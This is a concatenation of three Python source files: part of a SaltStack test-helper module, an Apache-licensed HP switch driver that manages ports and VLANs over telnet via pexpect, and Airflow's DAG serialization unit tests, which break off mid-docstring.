def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, six.text_type):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
class PatchedEnviron(object):
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, six.text_type):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], six.text_type):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
class VirtualEnv(object):
def __init__(self, venv_dir=None):
self.venv_dir = venv_dir or tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
if salt.utils.platform.is_windows():
self.venv_python = os.path.join(self.venv_dir, "Scripts", "python.exe")
else:
self.venv_python = os.path.join(self.venv_dir, "bin", "python")
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
shutil.rmtree(self.venv_dir, ignore_errors=True)
def install(self, *args, **kwargs):
return self.run(self.venv_python, "-m", "pip", "install", *args, **kwargs)
def run(self, *args, **kwargs):
check = kwargs.pop("check", True)
kwargs.setdefault("cwd", self.venv_dir)
kwargs.setdefault("stdout", subprocess.PIPE)
kwargs.setdefault("stderr", subprocess.PIPE)
kwargs.setdefault("universal_newlines", True)
proc = subprocess.run(args, check=False, **kwargs)
ret = ProcessResult(proc.returncode, proc.stdout, proc.stderr, proc.args)
log.debug(ret)
if check is True:
proc.check_returncode()
return ret
def _get_real_python(self):
"""
The reason why the virtualenv creation is proxied by this function is mostly
because under windows, we can't seem to properly create a virtualenv off of
another virtualenv(we can on linux) and also because, we really don't want to
test virtualenv creation off of another virtualenv, we want a virtualenv created
from the original python.
Also, on windows, we must also point to the virtualenv binary outside the existing
virtualenv because it will fail otherwise
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
self.venv_dir, python=self._get_real_python()
)
@contextmanager
def change_cwd(path):
"""
Context manager helper to change CWD for a with code block and restore
it at the end
"""
old_cwd = os.getcwd()
try:
os.chdir(path)
# Do stuff
yield
finally:
# Restore Old CWD
os.chdir(old_cwd)
|
hpswitch.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
# What HP switches is this for? The configuration syntax does not
# not appear like it would work for Procurves. - stroucki 20100224
import os
import sys
import pexpect
import datetime
import thread
import threading
import logging
from hwswitchinterface import HwSwitchInterface
class HwHPSwitch(HwSwitchInterface):
def __init__(self, config, host=None):
self.config = config
self.host = host
self.verbose = False
self.log = logging.getLogger(os.path.basename(__file__))
def setVerbose(self, verbose):
self.verbose = verbose
def __login(self):
switchIp = "telnet " + self.host['hw_name']
child = pexpect.spawn(switchIp)
opt = child.expect(['Name:', 'password:', pexpect.EOF, pexpect.TIMEOUT])
child.setecho(False)
if opt == 0:
child.sendline(self.host['hw_userid'])
# Be Verbose and print everything
if self.verbose:
child.logfile = sys.stdout
child.sendline(self.host['hw_password'])
i=child.expect(['Main#', pexpect.EOF, pexpect.TIMEOUT])
if i == 2:
mesg = "Login to %s failed\n" % (self.host['hw_name'])
self.log.error(mesg)
exit(1)
return child
def __getPrsLabel(self):
dadate = datetime.datetime.now().strftime("%Y%m%d-%H%M-%S")
return "ZONI_" + dadate
def __saveConfig(self, child):
#child.logfile = sys.stdout
cmd = "save"
child.sendline(cmd)
opt = child.expect(["Confirm(.*)", "No save(.*)", pexpect.EOF, pexpect.TIMEOUT])
if opt == 0:
print "saving to flash"
child.sendline("y\n")
if opt == 1:
print "no save needed"
child.sendline('exit')
child.terminate()
def enableHostPort(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + " /ena/apply "
child.sendline(cmd)
# testing this thread... Looks like this works ...
threading.Thread(target=self.__saveConfig(child)).start()
def disableHostPort(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + " /dis/apply "
child.sendline(cmd)
threading.Thread(target=self.__saveConfig(child)).start()
def removeVlan(self, num):
print "removing vlan"
# Check for important vlans
child = self.__login()
cmd = "/cfg / l2 / vlan " + num + " / del / apply"
child.sendline(cmd)
opt = child.expect(["Confirm(.*)", pexpect.EOF, pexpect.TIMEOUT])
if opt == 0:
child.sendline("y\n")
threading.Thread(target=self.__saveConfig(child)).start()
def addVlanToTrunk(self, vlan):
print "NOT IMPLEMENTED"
print "No trunks to test @ MIMOS"
def createVlansThread(self, vlan, switch,host):
mesg = "Creating vlan %s on switch %s" % (str(vlan), str(switch))
self.log.info(mesg)
self.createVlan(vlan)
self.addVlanToTrunk(vlan);
thread.exit()
def createVlans(self, vlan, switchlist, query):
for switch in switchlist:
#print "working on switch ", switch
#self.host = query.getSwitchInfo(switch)
#thread.start_new_thread(self.createVlansThread, (vlan, switch, self.host))
mesg = "Creating vlan %s on switch %s" % (str(vlan), str(switch))
self.log.info(mesg)
self.host = query.getSwitchInfo(switch)
self.createVlan(vlan)
self.addVlanToTrunk(vlan);
def removeVlans(self, vlan, switchlist, query):
for switch in switchlist:
mesg = "Deleting vlan %s on switch %s" % (str(vlan), str(switch))
self.log.info(mesg)
self.host = query.getSwitchInfo(switch)
self.removeVlan(vlan)
def createVlan(self, val):
vlanname = False
if ":" in val:
num = int(val.split(":")[0])
vlanname = val.split(":")[1]
else:
vlanname = self.__getPrsLabel()
num = int(val)
if num > 4095 or num < 0:
mesg = "Vlan out of range. Must be < %s" % (self.config['vlan_max'])
self.log.error(mesg)
exit(1)
child = self.__login()
cmd = "/cfg / l2 / vlan " + str(num) + " / ena/ apply"
child.sendline(cmd)
cmd = "name " + str(vlanname) + " / apply"
child.sendline(cmd)
threading.Thread(target=self.__saveConfig(child)).start()
# Raw Switch commands. DEBUG ONLY!, Doesn't work!
def sendSwitchCommand(self, cmds):
if len(cmds) > 0:
child = self.__login()
child.logfile = sys.stdout
for cmd in cmds.split(";"):
child.sendline(cmd)
try:
i=child.expect(['console','sw', 'Name:', pexpect.EOF, pexpect.TIMEOUT], timeout=2)
i=child.expect(['console','sw', 'Name:', pexpect.EOF, pexpect.TIMEOUT], timeout=2)
except pexpect.EOF:
print "EOF", i
#child.sendline()
except pexpect.TIMEOUT:
print "TIMEOUT", i
#child.interact(escape_character='\x1d', input_filter=None, output_filter=None)
child.terminate()
#print "before", child.before
#print "after", child.after
def addNodeToVlan(self, vlan):
child = self.__login()
cmd = "/cfg/l2/vlan " + str(vlan) + " /add " + str(self.host['hw_port']) + " /apply "
child.sendline(cmd)
opt = child.expect(['(.*)#','(.*)needs to be enabled', pexpect.EOF, pexpect.TIMEOUT], timeout=2)
if opt == 1:
print "VLAN Created, Enabling..." + str(vlan)
cmd = "/cfg/l2/vlan " + str(vlan) + " /ena/apply "
child.sendline(cmd)
threading.Thread(target=self.__saveConfig(child)).start()
def removeNodeFromVlan(self, vlan):
child = self.__login()
cmd = "/cfg/l2/vlan " + str(vlan) + " /rem " + str(self.host['hw_port']) + "/apply"
child.sendline(cmd)
threading.Thread(target=self.__saveConfig(child)).start()
def setNativeVlan(self, vlan):
child = self.__login()
#child.logfile = sys.stdout
cmd = "/cfg/port " + str(self.host['hw_port']) + "/pvid " + str(vlan) + "/apply"
child.sendline(cmd)
threading.Thread(target=self.__saveConfig(child)).start()
# HP switches allow more free control. Example, if you set a port to a native vlan
# that doesn't exist, HP switches will happily create for you.
# However, if you delete a vlan that exists on many ports, it will still happily delete
# the vlan, forcing all the other ports to default to some other native vlan. Need
# to make sure we check before blasting vlans.
# Restore Native Vlan.
def restoreNativeVlan(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + "/pvid 1/apply"
child.sendline(cmd)
threading.Thread(target=self.__saveConfig(child)).start()
# Setup the switch for node allocation
def allocateNode(self):
pass
# Remove all vlans from the interface
def removeAllVlans(self):
child = self.__login()
cmd = "/cfg/port " + str(self.host['hw_port']) + "/tag d/apply"
#child.logfile = sys.stdout
child.sendline(cmd)
def showInterfaceConfig(self):
print "\n---------------" + self.host['hw_make'] + "---------------------"
print "SWITCH - " + self.host['hw_name'] + "/" + str(self.host['hw_port'])
print "NODE- " + self.host['location']
print "------------------------------------\n"
# using run and parsing output. Still have issues an "rt" after the command. Fix later
#val = pexpect.run("telnet sw0-r4r1e1", withexitstatus=False, timeout=2, events=({'(?i)password:': "admin\r\n", "Main#": "info\r\n", "Info(.*)" : "port\r\n"})) #, "Info(.*)" : "exit\n"}))
# Just print everything for now, fix when back in the US
#print val
child = self.__login()
cmd = "/info/port " + str(self.host['hw_port'])
child.sendline(cmd)
child.logfile = sys.stdout
__opt = child.expect(['Info(.*)', pexpect.EOF, pexpect.TIMEOUT])
# this needs to be removed or rewritten
def interactiveSwitchConfig(self):
switchIp = "telnet " + self.host['hw_name']
child = pexpect.spawn(switchIp)
child.setecho(False)
#child.expect('Name:')
#child.sendline(self.host['hw_userid'])
#i=child.expect(['test','password:','Password:', pexpect.EOF, pexpect.TIMEOUT])
#child.logfile = sys.stdout
child.sendline(self.host['hw_password'])
child.interact(escape_character='\x1d', input_filter=None, output_filter=None)
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.schedule_interval == expected_schedule_interval
assert dag.normalized_schedule_interval == expected_n_schedule_interval
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
